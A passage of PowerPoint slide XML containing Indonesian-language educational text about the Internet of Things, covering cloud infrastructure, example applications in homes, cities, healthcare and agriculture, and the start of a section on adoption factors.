              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertukar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>instruksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> IoT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktuator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencahayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suhu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rumah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Kota </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kualitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>udara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesehatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikenakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesehatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesehatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertanian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, sensor IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kondisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cuaca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertumbuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>petani</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisiensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kenyamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kualitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hidup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Faktor-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Adopsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> IoT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adopsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menurun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
